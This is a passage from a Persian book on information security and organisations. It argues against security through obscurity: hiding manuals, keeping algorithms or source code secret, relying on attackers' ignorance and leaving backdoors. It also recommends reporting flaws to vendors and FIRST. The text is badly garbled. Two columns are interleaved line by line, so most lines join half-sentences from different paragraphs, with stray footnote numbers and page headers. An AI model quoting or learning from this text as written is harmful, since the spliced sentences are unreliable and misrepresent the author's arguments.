ﺩﺭ ﺯﻣﻴﻨﺔ ﻧﻴﺎﺯﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ ﻧﮕﺮﻳـﺴﺖ .ﻣـﺸﺎﺑﻪ ﻫﻤـﺔ ﻗـﺴﻤﺘﻬﺎﻱ "The 12 Layer Matrix: Building a Cyber-
Fortress (2003)":
http://wbln0018.worldbank.org/html/FinancialS
ectorWeb.nsf/SearchGeneral?openform&E-
Security/E-Finance&Tools
84 Compliance Audit Policy 83 Audit
١٥٥ ﺑﺨﺶ ﺳﻮﻡ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎ
ﻣﻄﻠﺐ ﺑﻴﺎﻣﻮﺯﻧﺪ ،ﻣﻤﻜﻦ ﺍﺳﺖ ﺍﺯ ﺩﺳﺘﮕﺎﻫﻬﺎ ﺑﻬـﺮﺓ ﺑـﺴﻴﺎﺭ ﻛﻤـﻲ ﺩﻳﮕﺮ ﺍﻣﻨﻴﺖ ،ﺍﻳﻨﺠﺎ ﻧﻴﺰ ﺭﻭﻳﻜﺮﺩ ﮔﺮﻭﻫﻲ ﺩﺭ ﺍﻛﺜﺮ ﻗﺮﻳﺐ ﺑﻪ ﺍﺗﻔﺎﻕ
ﺑﺒﺮﻧﺪ .ﻫﻤﭽﻨﻴﻦ ﻣﻤﻜﻦ ﺍﺳـﺖ ﺍﻧﮕﻴـﺰﺓ ﺍﻳـﺸﺎﻥ ﺗـﻀﻌﻴﻒ ﺷـﻮﺩ، ﺷﺮﺍﻳﻂ ﻣﺆﺛﺮﺗﺮﻳﻦ ﺭﻭﻳﻜـﺮﺩ ﺍﺳـﺖ .ﺍﮔـﺮ ﻣـﺴﺌﻠﻪ ﺑﻄـﻮﺭ ﺻـﺤﻴﺢ
ﭼﺮﺍﻛﻪ ﭘﻴﺎﻡ ﺿﻤﻨﻲ ﻣﺪﻳﺮﻳﺖ ﺑﺎ ﺍﻧﺠﺎﻡ ﺍﻳﻨﻜﺎﺭ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ "ﻣﺎ ﺑﻪ ﻣﺪﻳﺮﻳﺖ ﺷﻮﺩ ،ﻛﺎﺭﻛﻨﺎﻥ ﻣﻲﺗﻮﺍﻧﻨـﺪ ﺑـﻪ ﺍﻣﻨﻴـﺖ ﻣﻄﻠـﻮﺏ ﺩﺳـﺖ
ﺷﻤﺎ ﺍﻋﺘﻤﺎﺩ ﻛﺎﻣﻞ ﻧـﺪﺍﺭﻳﻢ ﻛـﻪ ﻳـﻚ ﻛـﺎﺭﺑﺮ ﻣـﺴﺌﻮﻟﻴﺖﺷـﻨﺎﺱ ﻳﺎﺑﻨﺪ .ﻧﻜﺘﺔ ﻛﻠﻴﺪﻱ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﺑﻪ ﺁﻧﻬﺎ ﺩﺭ ﺍﻧﺠـﺎﻡ ﻛﺎﺭﻫﺎﻳـﺸﺎﻥ
ﺑﺎﺷﻴﺪ" .ﺍﺯ ﺍﻳﻦ ﮔﺬﺷﺘﻪ ﺩﺭ ﭼﻨﻴﻦ ﺷﺮﺍﻳﻄﻲ ﺍﮔـﺮ ﻛـﺴﻲ ﺑـﻪ ﺳـﻮﺀ ﻛﻤــﻚ ﻛﻨــﻴﻢ ،ﻧــﻪ ﺍﻳﻨﻜــﻪ ﺧــﻮﺩ ﺭﺍ ﺩﺭ ﻃــﺮﻑ ﺩﻳﮕــﺮ ﻣﻴــﺰ ﻭ ﺩﺭ
ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻓﺮﺍﻣﻴﻦ ﻭ ﻭﻳﮋﮔﻴﻬﺎﻱ ﺳﻴﺴﺘﻢ ﺑﭙﺮﺩﺍﺯﺩ ،ﻣﻤﻜـﻦ ﺍﺳـﺖ ﻣﻘﺎﺑﻠﺸﺎﻥ ﻗﺮﺍﺭ ﺩﻫﻴﻢ.
ﻣﺪﻳﺮﻳﺖ ﺗﻮﺍﻧﺎﻳﻲ ﻛﺎﻓﻲ ﺑﺮﺍﻱ ﺷـﻨﺎﺧﺖ ﻭ ﻣﺒـﺎﺭﺯﻩ ﺑـﺎ ﻣـﺸﻜﻞ ﺭﺍ
ﻧﺪﺍﺷﺘﻪ ﺑﺎﺷﺪ؛ ﻭ ﺍﮔﺮ ﻣﺴﺌﻠﻪﺍﻱ ﺑﺮﺍﻱ ﻳﻚ ﻳﺎ ﺩﻭ ﻧﻔـﺮ ﺍﺯ ﻛـﺎﺭﺑﺮﺍﻥ ﺍﺷﻜﻼﺕ ﺍﻣﻨﻴﺖ ﻣﺒﺘﻨﻲ ﺑﺮ ﺟﻬﻞ ﻣﻬﺎﺟﻢ
ﻛﻪ ﻣﺠﺎﺯ ﺑﻪ ﺩﺳﺘﺮﺳﻲ ﺑﻪ ﺍﺳﻨﺎﺩ ﺑﻮﺩﻩﺍﻧﺪ ﺭﺥ ﺩﻫﺪ ،ﺩﻳﮕﺮ ﻛﺴﻲ ﺑـﺎ ﻲ ﺍﻣﻨﻴﺖ ﻛﻪ ﻋﻤﺪﺗﹰﺎ ﺍﺯ ﺳـﺎﺯﻣﺎﻥ ﺍﻃﻼﻋـﺎﺕ ﺩﺭ ﻣﻜﺎﻧﻴﺰﻣﻬﺎﻱ ﺳﻨﺘ ﹺ
ﺗﺠﺮﺑــﻪ ﻳــﺎ ﺍﻃﻼﻋــﺎﺕ ﻻﺯﻡ ﻭﺟــﻮﺩ ﻧــﺪﺍﺭﺩ ﻛــﻪ ﺩﺭ ﻣﻮﺍﻗــﻊ ﺑــﺮﻭﺯ ﺍﺭﺗﺶ ﻧﺸﺄﺕ ﻣﻲﮔﺮﻓﺖ ﻳﻚ ﻣﻔﻬﻮﻡ ﺑﺎ ﻋﻨﻮﺍﻥ "ﻧﻴﺎﺯ ﺑﻪ ﺩﺍﻧـﺴﺘﻦ"
ﻣﺸﻜﻼﺕ ﻫﻤﻴﺎﺭﻱ ﻛﻨﺪ. ﻭﺟﻮﺩ ﺩﺍﺷﺖ .ﺍﻃﻼﻋﺎﺕ ﺗﻘﺴﻴﻢﺑﻨﺪﻱ ﻣﻲﺷﺪ ﻭ ﺑﻪ ﻫﺮ ﻛﺲ ﺁﻧﻘﺪﺭ
ﻣﺤﺮﻣﺎﻧﻪ ﻧﮕﻬﺪﺍﺷﺘﻦ ﺍﺷﻜﺎﻻﺕ ﻳﺎ ﻗﺎﺑﻠﻴﺘﻬﺎ ﺑﺮﺍﻱ ﺍﻳﺠـﺎﺩ ﺣﻔﺎﻇـﺖ ﺍﺯ ﺁﻥ ﺗﺨﺼﻴﺺ ﻣﻲﻳﺎﻓﺖ ﻛﻪ ﺑﺘﻮﺍﻧﺪ ﺑﺎ ﺁﻥ ﺑـﻪ ﻭﻇـﺎﻳﻔﺶ ﻋﻤـﻞ
ﺩﺭ ﻣﻘﺎﺑــﻞ ﺁﻧﻬــﺎ ﻧﻴــﺰ ﻳــﻚ ﺭﻭﻳﻜــﺮﺩ ﺿــﻌﻴﻒ ﺍﻣﻨﻴﺘــﻲ ﺍﺳــﺖ. ﻛﻨــﺪ .ﺩﺭ ﻣﺤﻴﻄﻬــﺎﻳﻲ ﻛــﻪ ﻗــﺴﻤﺘﻬﺎﻱ ﺧﺎﺻــﻲ ﺍﺯ ﺍﻃﻼﻋــﺎﺕ ﺍﺯ
ﻻ ﺩﺭ ﺑﺮﻧﺎﻣﻪﻫﺎﻳﺸﺎﻥ ﺩﺭﺏ ﻣﺨﻔﻲ ﻗﺮﺍﺭ ﻧﻮﻳﺴﻨﺪﮔﺎﻥ ﻧﺮﻡﺍﻓﺰﺍﺭ ﻣﻌﻤﻮ ﹰ ﺣﺴﺎﺳﻴﺖ ﺑﺮﺧﻮﺭﺩﺍﺭﻧﺪ ﻳﺎ ﺍﻣﻨﻴﺖ ﺍﺳﺘﻨﺒﺎﻃﻲ ٨٥ﺑﺎﻳﺪ ﺑﺮﻗـﺮﺍﺭ ﺑﺎﺷـﺪ،
ﺑﺨﺶ ﺳﻮﻡ
ﻣﻲﺩﻫﻨﺪ ﻛﻪ ﺑﻪ ﺁﻧﻬﺎ ﺍﺟﺎﺯﻩ ﻣـﻲﺩﻫـﺪ ﺑـﺪﻭﻥ ﺍﺭﺍﺋـﻪ ﺭﻣـﺰ ﻋﺒـﻮﺭ، ﺍﻳﻦ ﺳﻴﺎﺳﺖ ﺍﺯ ﻣﻌﻨﺎﻱ ﺧﺎﺻﻲ ﺑﺮﺧﻮﺭﺩﺍﺭ ﺍﺳﺖ .ﺍﮔـﺮ ﺳـﻪ ﻗﻄﻌـﺔ
ﺍﻣﺘﻴﺎﺯﺍﺕ ﺩﺳﺘﺮﺳﻲ ﺑﺪﺳﺖ ﺑﻴﺎﻭﺭﻧﺪ .ﮔﺎﻫﻲ ﻧﻴﺰ ﺍﺷﻜﺎﻻﺕ ﺳﻴـﺴﺘﻢ ﺍﻃﻼﻋﺎﺗﻲ ﺩﺭ ﻛﻨﺎﺭ ﻫﻢ ﺑﺘﻮﺍﻧﻨﺪ ﻳﻚ ﻧﺘﻴﺠﺔ ﻣﺨﺮﺏ ﺑﻪ ﺑﺎﺭ ﺑﻴﺎﻭﺭﻧﺪ
ﺑﺎ ﻋﻮﺍﺭﺽ ﻋﻤﻴﻖ ﺍﻣﻨﻴﺘﻲ ﻫﻤﭽﻨﺎﻥ ﺑﺎﻗﻲ ﻣﻲﻣﺎﻧﻨﺪ ،ﭼﺮﺍﻛﻪ ﻣـﺪﻳﺮ ﻭﻟﻲ ﻫﻴﭽﻜﺲ ﺑﻪ ﺑﻴﺶ ﺍﺯ ﺩﻭ ﻗﻄﻌﻪ ﺍﺯ ﺁﻥ ﺍﻃﻼﻋـﺎﺕ ﺩﺳﺘﺮﺳـﻲ
ﺗﺼﻮﺭ ﻣﻲﻛﻨﺪ ﻛﺴﻲ ﺍﺯ ﺁﻧﻬﺎ ﺍﻃﻼﻉ ﻧﺪﺍﺭﺩ .ﻣﺸﻜﻞ ﺍﻳﻦ ﺭﻭﻳﻜﺮﺩﻫﺎ ﻧﺪﺍﺷﺘﻪ ﺑﺎﺷﺪ ﺁﻧﮕﺎﻩ ﻣﻲﺗﻮﺍﻥ ﮔﻔﺖ ﻛﻪ ﺍﻣﻨﻴﺖ ﺗﻀﻤﻴﻦ ﺷﺪﻩ ﺍﺳﺖ.
ﺍﻳﻦ ﺍﺳـﺖ ﻛـﻪ ﺍﺣﺘﻤـﺎﻝ ﺯﻳـﺎﺩﻱ ﻭﺟـﻮﺩ ﺩﺍﺭﺩ ﻛـﻪ ﻣـﺸﻜﻼﺕ ﻭ ﺩﺭ ﻳﻚ ﻣﺤﻴﻂ ﻋﻤﻠﻴﺎﺕ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺑﻜﺎﺭ ﮔﺮﻓﺘﻦ ﻣﻔﻬـﻮﻡ "ﻧﻴـﺎﺯ ﺑـﻪ
ﻭﻳﮋﮔﻴﻬﺎﻱ ﻣﻮﺟﻮﺩ ﺩﺭ ﺑﺮﻧﺎﻣﻪ ﺑﺼﻮﺭﺕ ﺗﺼﺎﺩﻓﻲ ﻭ ﻳﺎ ﺑﻮﺳﻴﻠﺔ ﻳـﻚ ﻻ ﻣﻨﺎﺳﺐ ﻧﻴﺴﺖ .ﺍﻳﻦ ﻣﺴﺌﻠﻪ ﺑﻮﻳﮋﻩ ﺩﺭ ﺷـﺮﺍﻳﻄﻲ ﺩﺍﻧﺴﺘﻦ" ﻣﻌﻤﻮ ﹰ
ﻧﻔﻮﺫﮔﺮ ﻣﺼﻤﻢ ﻛﺸﻒ ﺷـﻮﻧﺪ .ﻣﺨﻔـﻲ ﻧﮕﻬﺪﺍﺷـﺘﻦ ﺍﺷـﻜﺎﻻﺕ ﻭ ﺻﺪﻕ ﻣﻲﻛﻨﺪ ﻛﻪ ﺷﻤﺎ ﺍﻣﻨﻴﺖ ﺧﻮﺩ ﺭﺍ ﺑـﺮ ﺍﻳـﻦ ﻣﺒﻨـﺎ ﻗـﺮﺍﺭ ﺩﺍﺩﻩ
ﻭﻳﮋﮔﻴﻬﺎ ﺑﻪ ﺍﻳﻦ ﻣﻌﻨﻲ ﺍﺳﺖ ﻛﻪ ﻣﻮﺭﺩ ﻣﺸﺎﻫﺪﻩ ﻗﺮﺍﺭ ﻧﻤﻲﮔﻴﺮﻧﺪ ﻭ ﺑﺎﺷﻴﺪ ﻛﻪ ﻳﻚ ﻣﺴﺌﻠﻪ ﻓﻨﻲ ﺑﺮﺍﻱ ﻣﻬﺎﺟﻤﺎﻥ ﻧﺎﺩﺍﻧﺴﺘﻪ ﺑﺎﺷﺪ .ﺍﺗﻜـﺎ
ﻃﺒﻴﻌﺘﹰﺎ ﺍﺻﻼﺡﻧﺸﺪﻩ ﺑﺎﻗﻲ ﻣﻲﻣﺎﻧﻨـﺪ .ﻟـﺬﺍ ﭘـﺲ ﺍﺯ ﺁﻧﻜـﻪ ﻛـﺸﻒ ﺑﻪ ﺟﻬﻞ ﻣﻬﺎﺟﻤﻴﻦ ﻣﻲﺗﻮﺍﻧﺪ ﺑﻪ ﺍﻳﻤﻨﻲ ﺷﻤﺎ ﺧﺪﺷﻪ ﻭﺍﺭﺩ ﻛﻨﺪ.
ﺷﺪﻧﺪ ،ﻭﺟﻮﺩ ﻣﺸﻜﻞ ﺑﺎﻋﺚ ﻣﻲﺷﻮﺩ ﺗﻤـﺎﻡ ﺳﻴـﺴﺘﻤﻬﺎﻱ ﻣـﺸﺎﺑﻪ
ﻧــﺴﺒﺖ ﺑــﻪ ﺣﻤﻠــﺔ ﺍﻓــﺮﺍﺩﻱ ﻛــﻪ ﻣــﺸﻜﻞ ﺭﺍ ﻛــﺸﻒ ﻛــﺮﺩﻩﺍﻧــﺪ ﻣﺤﻴﻄﻲ ﺭﺍ ﺩﺭﻧﻈﺮ ﺑﮕﻴﺮﻳﺪ ﻛﻪ ﺩﺭ ﺁﻥ ﻣﺪﻳﺮﻳﺖ ﺗﺼﻤﻴﻢ ﻣﻲﮔﻴـﺮﺩ
ﺁﺳﻴﺐﭘﺬﻳﺮ ﺑﺎﺷﻨﺪ. ﻛﺘﺎﺑﭽﻪ ﻫﺎﻱ ﺭﺍﻫﻨﻤﺎ ﺭﺍ ﺍﺯ ﺩﺳـﺘﺮﺱ ﻛـﺎﺭﺑﺮﺍﻥ ﺩﻭﺭ ﻧﮕـﻪ ﺩﺍﺭﺩ ﺗـﺎ
ﺍﺟﺎﺯﻩ ﻧﺪﻫﺪ ﺩﺭ ﻣﻮﺭﺩ ﻓﺮﺍﻣﻴﻦ ﻭ ﮔﺰﻳﻨﻪﻫﺎﻳﻲ ﻛﻪ ﻣﻤﻜﻦ ﺍﺳـﺖ ﺑـﺎ
ﻼ ﻳـﻚ ﺍﻟﮕـﻮﺭﻳﺘﻢ ﺍﺭﺯﺵ ﻣﺨﻔﻲ ﻧﮕﻬﺪﺍﺷﺘﻦ ﺍﻟﮕﻮﺭﻳﺘﻤﻬـﺎ -ﻣـﺜ ﹰ ﺁﻧﻬﺎ ﺑﺘﻮﺍﻥ ﺑﻪ ﺳﻴﺴﺘﻢ ﺧﺪﺷـﻪ ﻭﺍﺭﺩ ﻛـﺮﺩ ﻣﻄﻠﺒـﻲ ﺑﻴﺎﻣﻮﺯﻧـﺪ .ﺩﺭ
ﺍﻧﺤﺼﺎﺭﻱ ﺭﻣﺰﮔﺬﺍﺭﻱ -ﻧﻴﺰ ﻗﺎﺑﻞ ﺑﺤﺚ ﺍﺳﺖ .ﺗﺎ ﺯﻣﺎﻧﻴﻜـﻪ ﻳـﻚ ﭼﻨﻴﻦ ﺷﺮﺍﻳﻄﻲ ﻣﺪﻳﺮﺍﻥ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑـﺮ ﺍﻳـﻦ ﺑـﺎﻭﺭ ﺑﺎﺷـﻨﺪ ﻛـﻪ
ﻣﺘﺨﺼﺺ ﺭﻣﺰﻧﮕﺎﺭﻱ ٨٦ﻧﺒﺎﺷﻴﺪ ﻧﻤﻲﺗﻮﺍﻧﻴـﺪ ﻗـﺪﺭﺕ ﺍﻟﮕـﻮﺭﻳﺘﻢ ﺭﺍ ﺑﺪﻳﻨﻮﺳﻴﻠﻪ ﺍﻣﻨﻴﺖ ﺧﻮﺩ ﺭﺍ ﺍﻓﺰﺍﻳﺶ ﺩﺍﺩﻩﺍﻧﺪ ،ﺍﻣـﺎ ﺩﺭ ﻭﺍﻗـﻊ ﺍﻳﻨﻄـﻮﺭ
ﺗﺸﺨﻴﺺ ﺩﻫﻴﺪ .ﻧﺘﻴﺠﻪ ﻣﻤﻜﻦ ﺍﺳﺖ ﻣﻜﺎﻧﻴﺰﻣﻲ ﺑﺎﺷﺪ ﻛـﻪ ﺩﺍﺭﺍﻱ ﻧﻴﺴﺖ .ﻳﻚ ﻣﻬﺎﺟﻢ ﻣﺼﻤﻢ ﻣﻲﺗﻮﺍﻧﺪ ﺍﻳﻦ ﺍﺳﻨﺎﺩ ﺭﺍ ﺟﺎﻱ ﺩﻳﮕﺮﻱ
ﻧﻘﺎﻳﺺ ﺟﺪﻱ ﺍﺳﺖ .ﺍﻟﮕﻮﺭﻳﺘﻤﻲ ﻛﻪ ﻣﺨﻔﻲ ﻧﮕﻬﺪﺍﺷﺘﻪ ﻣﻲ ﺷـﻮﺩ ﭘﻴﺪﺍ ﻛﻨﺪ -ﺍﺯ ﻃﺮﻳﻖ ﻛﺎﺭﺑﺮﺍﻥ ﻳﺎ ﺍﺩﺍﺭﺍﺕ ﺩﻳﮕﺮ .ﻣﻘﺎﺩﻳﺮ ﻓﺮﺍﻭﺍﻧﻲ ﺍﺯ
ﻃﺒﻴﻌﺘﹰﺎ ﺗﻮﺳﻂ ﺩﻳﮕﺮﺍﻥ ﻣﻮﺭﺩ ﺑﺮﺭﺳﻲ ﻗﺮﺍﺭ ﻧﻤـﻲﮔﻴـﺮﺩ ﻭ ﻟـﺬﺍ ﻫـﺮ ﺍﻳﻦ ﺍﺳﻨﺎﺩ ﺩﺭ ﻓﺎﺻﻠﻪﺍﻱ ﻛﻤﺘﺮ ﺍﺯ ﻧﺰﺩﻳﻜﺘﺮﻳﻦ ﻛﺘﺎﺑﻔﺮﻭﺷﻲ ﺑﻪ ﻫـﺮ
ﻛﺴﻲ ﻛﻪ ﺍﺷﻜﺎﻟﻲ ﺩﺭ ﺁﻥ ﺑﻴﺎﺑﺪ ﺧﻮﺍﻫـﺪ ﺗﻮﺍﻧـﺴﺖ ﺑـﺪﻭﻥ ﺍﻃـﻼﻉ ﺍﺩﺍﺭﻩ ﻣﻮﺟﻮﺩ ﻫﺴﺘﻨﺪ! ﻣﺪﻳﺮﻳﺖ ﻧﻤﻲ ﺗﻮﺍﻧﺪ ﻫﻤﺔ ﺭﺍﻫﻬﺎﻱ ﻳﺎﺩﮔﻴﺮﻱ
ﺷﻤﺎ ﺑﻪ ﺩﺍﺩﻩﻫﺎﻳﺘﺎﻥ ﺩﺳﺘﺮﺳﻲ ﭘﻴﺪﺍ ﻛﻨﺪ. ﺩﺭ ﻣﻮﺭﺩ ﺳﻴﺴﺘﻢ ﺭﺍ ﺑﺒﻨﺪﺩ .ﺿﻤﻦ ﺍﻳﻨﻜﻪ ﻛﺎﺭﺑﺮﺍﻥ ﻣﺤﻠﻲ ﺑـﻪ ﺍﻳـﻦ
ﺑﻄﻮﺭ ﻣﺸﺎﺑﻪ ﻣﺤﺮﻣﺎﻧﻪ ﻧﮕﻬﺪﺍﺷﺘﻦ ﻣﺘﻦ ﺑﺮﻧﺎﻣﺔ ﺳﻴﺴﺘﻢﻋﺎﻣـﻞ ﻳـﺎ ﺩﻟﻴﻞ ﻛﻪ ﻧﻤﻲﺗﻮﺍﻧﻨﺪ ﺍﺳﻨﺎﺩ ﺭﺍ ﺑﺒﻴﻨﻨﺪ ﻭ ﺩﺭ ﻣﻮﺭﺩ ﮔﺰﻳﻨﻪﻫﺎﻱ ﻛﺎﺭﺁﺗﺮ
ﺗﻮﺳﻌﻪﺩﻫﻨـﺪﺓ ﺁﻥ ﻧـﺮﻡﺍﻓـﺰﺍﺭ ﺍﻃـﻼﻉ ﺩﻫﻴـﺪ .ﻫﻤﭽﻨـﻴﻦ ﺗﻮﺻـﻴﻪ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﻛﺎﺭﺑﺮﺩﻱ ﻧﻴﺰ ﻫﻴﭻ ﺗـﻀﻤﻴﻨﻲ ﺑـﺮﺍﻱ ﺗـﺄﻣﻴﻦ ﺍﻣﻨﻴـﺖ
ﻣﻲﻛﻨﻴﻢ ﻛﻪ ﺁﻧﺮﺍ ﺑﻪ ﺍﻃﻼﻉ ﻳﻜﻲ ﺍﺯ ﻣﺆﺳـﺴﺎﺕ ) FIRSTﻛـﻪ ﺩﺭ ﺑﻮﺟﻮﺩ ﻧﻤﻲﺁﻭﺭﺩ .ﻛﺴﺎﻧﻴﻜﻪ ﺗﺼﻤﻴﻢ ﮔﺮﻓﺘﻪ ﺑﺎﺷﻨﺪ ﺑﻪ ﺳﻴﺴﺘﻢ ﺷﻤﺎ
ﺿﻤﻴﻤﺔ ۴ﺩﺭ ﻣﻮﺭﺩ ﺁﻧﻬﺎ ﺗﻮﺿﻴﺢ ﺩﺍﺩﻩ ﺷﺪﻩ( ﻧﻴﺰ ﺑﺮﺳﺎﻧﻴﺪ .ﺍﻳﻦ ﻣﺆﺳﺴﺎﺕ ﻭﺍﺭﺩ ﺷﻮﻧﺪ ﻫﺮ ﺍﺯ ﭼﻨﺪﮔﺎﻩ ﺣﻔﺮﻩﻫﺎﻱ ﺍﻣﻨﻴﺘـﻲ ﺭﺍ ﭘﻴـﺪﺍ ﻣـﻲﻛﻨﻨـﺪ؛
ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑﻪ ﺗﻮﺳﻌﻪﺩﻫﻨﺪﮔﺎﻥ ﻛﻤﻚ ﻛﻨﻨﺪ ﺗﺎ ﺑـﺮﺍﻱ ﺣﻔـﺮﻩﻫـﺎﻱ ﻣﺴﺘﻘﻞ ﺍﺯ ﺍﻳﻨﻜﻪ ﻣﺘﻦ ﺑﺮﻧﺎﻣﻪ ﺭﺍ ﺩﺭ ﺍﺧﺘﻴﺎﺭ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻨﺪ ﻳﺎ ﻧﺪﺍﺷﺘﻪ
ﺍﻣﻨﻴﺘﻲ ﻛﺸﻒﺷﺪﻩ ﻭﺻﻠﻪﻫﺎﻳﻲ ﺗﻬﻴﻪ ﻧﻤﺎﻳﻨﺪ ﻭ ﻣﻄﻤﺌﻦ ﺷﻮﻧﺪ ﻛـﻪ ﺑﺎﺷﻨﺪ ٨٧.ﺍﻣﺎ ﺑﺪﻭﻥ ﺩﺳﺘﺮﺳﻲ ﺑﻪ ﻣﺘﻦ ﺑﺮﻧﺎﻣﻪ ،ﻛﺎﺭﺑﺮﺍﻥ ﻧﻤﻲﺗﻮﺍﻧﻨﺪ
ﻭﺻﻠﻪﻫـﺎ ﺗﻮﺯﻳـﻊ ﺷـﺪﻩ ﻭ ﺑﻄـﻮﺭ ﺻـﺤﻴﺢ ﻣـﻮﺭﺩ ﺍﺳـﺘﻔﺎﺩﻩ ﻗـﺮﺍﺭ ﺁﻧﺮﺍ ﺑﻄﻮﺭ ﻣﺪﻭﻥ ﺑﺮﺭﺳﻲ ﻛﻨﻨﺪ ﺗﺎ ﻣـﺸﻜﻼﺕ ﺁﻧـﺮﺍ ﺑﻴﺎﺑﻨـﺪ؛ ﻭ ﻟـﺬﺍ
ﮔﺮﻓﺘﻪﺍﻧﺪ. ﻫﺮﭼﻨﺪ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﺎ ﻣﺨﻔﻲ ﻧﮕﻬﺪﺍﺷﺘﻦ ﻣـﺘﻦ ﺑﺮﻧﺎﻣـﻪ ﻣﺰﻳـﺖ
ﻛﻮﭼﻜﻲ ﺑﻮﺟﻮﺩ ﺑﻴﺎﻳﺪ ،ﺍﻣﺎ ﺍﻣﻨﻴـﺖ ﻧﺒﺎﻳـﺪ ﺑـﻪ ﺍﻳـﻦ ﻣﺨﻔـﻲﺑـﻮﺩﻥ
ﺍﮔﺮ ﺣﻔﺮﺓ ﺍﻣﻨﻴﺘﻲ ﻳﻚ ﻧﺮﻡﺍﻓﺰﺍﺭ ﺭﺍ ﺩﺭ ﺑـﻮﻕ ﻭ ﻛﺮﻧـﺎ ﻛﻨﻴـﺪ ،ﺗﻤـﺎﻡ
ﻭﺍﺑﺴﺘﮕﻲ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ.
ﺍﻓﺮﺍﺩﻱ ﺭﺍ ﻛﻪ ﺍﺯ ﺁﻥ ﻧﺮﻡﺍﻓﺰﺍﺭ ﺍﺳـﺘﻔﺎﺩﻩ ﻣـﻲﻛﻨﻨـﺪ ﻭ ﻧﻤـﻲﺗﻮﺍﻧﻨـﺪ
ﺍﺷﻜﺎﻻﺕ ﺁﻧﺮﺍ ﺭﻓﻊ ﻛﻨﻨـﺪ ﺩﭼـﺎﺭ ﻣـﺸﻜﻞ ﻛـﺮﺩﻩﺍﻳـﺪ .ﺩﺭ ﻣﺤـﻴﻂ ﻧﮕﺮﺵ ﺑﻪ ﻣﻘﻮﻟﺔ ﺍﻣﻨﻴﺖ ﻳـﻚ ﻧﻜﺘـﺔ ﻛﻠﻴـﺪﻱ ﺍﺳـﺖ .ﺩﺭﺻـﻮﺭﺕ
Unixﺑﺴﻴﺎﺭﻱ ﺍﺯ ﻛﺎﺭﺑﺮﺍﻥ ﻋﺎﺩﺕ ﻛﺮﺩﻩﺍﻧـﺪ ﻛـﻪ ﺑـﺮﺍﻱ ﺍﺻـﻼﺡ ﺧﺪﺷﻪﺩﺍﺭ ﺷﺪﻥ ﻣﺤﺮﻣﺎﻧﮕﻲ ﺁﻧﺪﺳﺘﻪ ﺍﺯ ﺍﻗﺪﺍﻣﺎﺕ ﺩﻓـﺎﻋﻲ ﻛـﻪ ﺑـﺮ
ﺍﺷﻜﺎﻻﺕ ﻳﻚ ﺑﺮﻧﺎﻣﻪ ،ﺩﺭ ﻣﺘﻦ ﺁﻥ ﺍﻳﺠﺎﺩ ﺗﻐﻴﻴﺮﺍﺕ ﻛﻨﻨﺪ. ﻣﺒﻨﺎﻱ ﻣﺨﻔﻲﻛﺎﺭﻱ ﺍﺳـﺘﻮﺍﺭﻧﺪ ﻫﻤﮕـﻲ ﺍﺭﺯﺵ ﺧـﻮﺩ ﺭﺍ ﺍﺯ ﺩﺳـﺖ
ﺧﻮﺍﻫﻨﺪ ﺩﺍﺩ .ﺣﺘﻲ ﺑﺪﺗﺮ ﺍﺯ ﺁﻥ ﺍﻳﻨﻜـﻪ ﺗـﺪﺍﻭﻡ ﻣﺤﺮﻣـﺎﻧﮕﻲ ﺑﺎﻋـﺚ
ﻣﺘﺄﺳﻔﺎﻧﻪ ﻫﻤﻪ ﺍﺯ ﭼﻨﻴﻦ ﻗﺎﺑﻠﻴﺘﻲ ﺑﺮﺧﻮﺭﺩﺍﺭ ﻧﻴـﺴﺘﻨﺪ ﻭ ﺑـﺴﻴﺎﺭﻱ ﺍﺯ
ﺟﻠﻮﮔﻴﺮﻱ ﻳﺎ ﻣﺤﺪﻭﺩ ﺷﺪﻥ ﺑﺎﺯﺑﻴﻨﻲ ﻭ ﻧﻈﺎﺭﺕ ﺑﺮ ﺑﺮﻧﺎﻣﻪ ﻣﻲﺷـﻮﺩ
ﻣﺼﺮﻑﻛﻨﻨﺪﮔﺎﻥ ﺑﺎﻳﺪ ﻫﻔﺘﻪﻫﺎ ﻳﺎ ﻣﺎﻫﻬﺎ ﺻﺒﺮ ﻛﻨﻨﺪ ﺗـﺎ ﻧـﺮﻡﺍﻓـﺰﺍﺭ
ﻭ ﻣﻤﻜﻦ ﺍﺳﺖ ﻫﺮﮔﺰ ﻧﺘﻮﺍﻥ ﻓﻬﻤﻴـﺪ ﻛـﻪ ﺁﻳـﺎ ﺍﻳـﻦ ﻣﺤﺮﻣـﺎﻧﮕﻲ
ﺑﻪﺭﻭﺯﺭﺳﺎﻧﻲﺷﺪﻩ ﺗﻮﺳﻂ ﻓﺮﻭﺷﻨﺪﺓ ﻣﺮﺑﻮﻃﻪ ﻣﻨﺘﺸﺮ ﺷـﻮﺩ .ﺑﻌـﻀﻲ
ﺍﺩﺍﺭﺍﺕ ﻣﻤﻜﻦ ﺍﺳﺖ -ﺑﺪﻟﻴﻞ ﺍﻳﻨﻜﻪ ﺟﺰ ﺭﻭﺷﻦ ﻛـﺮﺩﻥ ﺭﺍﻳﺎﻧـﻪ ﻭ ﺧﺪﺷﻪﺩﺍﺭ ﺷﺪﻩ ﺍﺳﺖ ﻳﺎ ﺧﻴﺮ .ﺑﻮﺳﻴﻠﺔ ﺍﻟﮕﻮﺭﻳﺘﻤﻬﺎ ﻭ ﻣﻜﺎﻧﻴﺰﻣﻬﺎﻳﻲ
